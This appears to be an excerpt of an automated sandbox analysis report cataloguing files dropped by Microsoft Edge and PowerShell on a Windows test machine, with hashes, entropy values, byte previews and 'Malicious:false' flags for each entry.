                                                                                                                                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:@...e...........................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\52ef9877-e477-4dc6-b1b3-91e2851c98fd.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\72a071e4-1a5b-4a14-bf38-71c157a3777f.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\76976648-b933-419c-915a-d2df7398c10f.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1200x800, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):163840
                                                                                                                                                                                                                  Entropy (8bit):7.998819356575957
                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                  SSDEEP:3072:H7Uxsy3eSeT4buEoFmO7f4duw1G4J3ZEssmwDLwUeiwaODY:H7byuSeTYCXQdDhwDL3NLOs
                                                                                                                                                                                                                  MD5:0CECA59F492AF57C4F259F23B61A5DE8
                                                                                                                                                                                                                  SHA1:31AAF693A5EBFA6776D174CA8317F4AE3B962C5D
                                                                                                                                                                                                                  SHA-256:9FCE36F9079249E80B733AA5C9180F024027C5774CA55E89742A2CDBF88CFAE1
                                                                                                                                                                                                                  SHA-512:4796A025492188D74D93335DCCE299EB2F205344A82266B7A9EF7F29D797CFB84E024304730BEEEFAD22E7980943D98567B0FFA182E5B626D8C39712C043A711
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8 ....0....*.. .>I .E".!!'...P..ei...=8.9y.\......G..D.#m.........^...=J?z.P.....?..s.......j8...../.>..|...`o..w.[.|..7.........i...].W......K|.........a/._.?i...k.w.....o.w.....}.h.b.e.s.g....A..?..............o.....>..........G...7...W..._.................<.......q~..i..........S..o.^;;..O......>..........f........9...W./.......?z?...}..w.../'.G.g.........k....?....]..._.?....Y.k...G.......?....../.....~....F...[...o../.?......7.........I............~b~......9.g.....W.........P/._...^...sM...`l..T.r....6.w%..x..G.......Y....fWR.*gm.h`Y.....?..)......34.N.+T..:.q..W..b.L7.8.>KXN3..RI%ll......yI........i..".2.W...@.1.....I..7.bXD...t..s.`..c..q\.ujc.*..r.......<.`E,7...C.....e..^h.G...u".>...9W.4..M.....5.(w.~.ls....s.AG.QS.n...]..j.zyk..;.V.2=vN.7.U.C.n.w.A..36;6........}......&....c.....p.3.'..>{...s..a....We.mC....y.Q...Z.C.>.\.....O..."*"X..Z2..7..`.6....~p.~A.rFZ..#E"E.....Jp...K.0.j.?.{k..{.+.QTM-DZ.f.X.j...^.....<.#w..gI.<

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_02ecv42i.dag.psm1

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2uvz2aq2.ew3.ps1

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aiuo1yij.j2r.ps1

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g3ekt02s.hgp.ps1

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nfnev2vb.tpb.ps1

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o4x4whhs.4yp.psm1

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tjsh23fo.jnc.psm1

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wlodcta5.u15.psm1

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\b2570ff2-650d-4e85-a50a-be627ff04ec9.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):206855
                                                                                                                                                                                                                  Entropy (8bit):7.983996634657522
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
                                                                                                                                                                                                                  MD5:788DF0376CE061534448AA17288FEA95
                                                                                                                                                                                                                  SHA1:C3B9285574587B3D1950EE4A8D64145E93842AEB
                                                                                                                                                                                                                  SHA-256:B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
                                                                                                                                                                                                                  SHA-512:3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1658
                                                                                                                                                                                                                  Entropy (8bit):5.409825301624222
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:Y4MfJVe5wMd5wMe07cIF5Io0MY5kU2A0OpJ5xnL0MotJ5VovUx0K1X5mU0Z/L5M:JIVuwEw5MUFZLBQLtZ6NM
                                                                                                                                                                                                                  MD5:02AD9E3BC3D2638429DD9E8C87C2D690
                                                                                                                                                                                                                  SHA1:9E177A82ECECA4EDF0AA6CD47022CE1B551D8E2D
                                                                                                                                                                                                                  SHA-256:B5CED00336E69FBF3A610F3CDF280BB4B96E4734A9CF07DD7D5A0B75DDF8E2A4
                                                                                                                                                                                                                  SHA-512:1AD466782536B6B74BABB5C099BD1F3032187F3A23FADC1268F387EC05AB791D59823576F43A459C4FC4D0BEECF3B6A9FBA24A170506598577420DCE7B3E6760
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"logTime": "1005/061810", "correlationVector":"0kV+/vRB8ay0a3Cue7mk6o","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"AFo3IfjRT+3l4ojiXpMdNH","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"838E3BF9A44F456CB4AD62AC737EDD15","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063233", "correlationVector":"2N8fwTcZh6EtTfQ8o4+6aX","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063233", "correlationVector":"5ADEBA42608E4CC9A1FACA719F284CF9","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063346", "correlationVector":"xp/hBMCdVPtUIxZHIviv/x","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063347", "correlationVector":"BF0B9E58C0CC45ED9AB5D0371131E69A","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/064305", "correlationVector":"ONVjsWDap1LyjIRdxsqPGs","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/064305", "correlationVector":"82E52491

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\da4f0ef1-4ea4-4f35-af83-109610201ab0.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):154477
                                                                                                                                                                                                                  Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                  MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                  SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                  SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                  SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\dae90165-80eb-4d03-b991-23e3b678ceb1.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\e858e8a6-80a2-4647-8867-f34a41a4cec6.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41924
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):76314
                                                                                                                                                                                                                  Entropy (8bit):7.996159328201069
                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                  SSDEEP:1536:fFZ2cHkObrS5Vvm808scZeEzFrSpzBUl4MZIGM/iysAGz88:fbb1UdS8scZNzFrMa4M+lKqeZ
                                                                                                                                                                                                                  MD5:703D592C85D2790D89047C1614A54B4F
                                                                                                                                                                                                                  SHA1:0C08F096AD544A63ACE8AA1AA738CC0B374F2A23
                                                                                                                                                                                                                  SHA-256:A01513000969824FA1761DCDD77F5EE9B6FD958B4E9596522CEBC47BB69DF194
                                                                                                                                                                                                                  SHA-512:D0C0F0B0A060D3DD52942556615B93971292E1F0C10555681CB6E4857E605EB2CFBACBADD263FB954D4062A63BBCCCB4B514428FDB95F6C0C94CC221B28B1ED5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:...........}io.8..w... @*..S..=.X.v.^$..e..0..r.ek.,.+..x..._..$."..:.....]E>7..x..z...?..7t.s.....!/.."..}../....u...^..|{...B...]....q....Znh....;B.u....r.z..._.w~p.}<......B.....}k.........a....ur......:.E.~..f7!.....c....V.Z.."..._Q..m....?..q.......{;.V.g.".i..<.r=.9.>...}^.Ykw....\,. .. .<YkL........C*...........m.'....0O....g.?.8C............x.........=YO.......`.<....o..=..he..AaHy@g....z.)C..G....[.@.........x.......O...c..H..5..}..5$?.:....7g.....M~....4....u..P...c...S..w.(.2N['......&..v...."p.#..Z.F.<'._........&~CA......Z....p......>.o......m.(....a_%F.}r||z.m...1..8....p.-..4'.O....S0..f<.n...KP<.fd.....-w[B..%....Z!..H...C..CB+J)Ef.t[;.1.?.Q.j{.....*.y...>Y.......Me..Vx!.._...(>.......>.j.%.(..%]...E...~.p......tp.P.3........W>V&.J.s.]..../~.^.....u.X.1.J.6..8.^...Q.a8".z}....|.V.M".+..y.-...r..b..'k..9..~.@g3.:..n....M....s.T.#|.Vd.../..K<...^...p......X.5..6..F..".tO...........o}......}...D..`o....<..(....?..y.JQ.....F01a

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_1377315504\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1753
                                                                                                                                                                                                                  Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                  MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                  SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                  SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                  SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                  Malicious:false
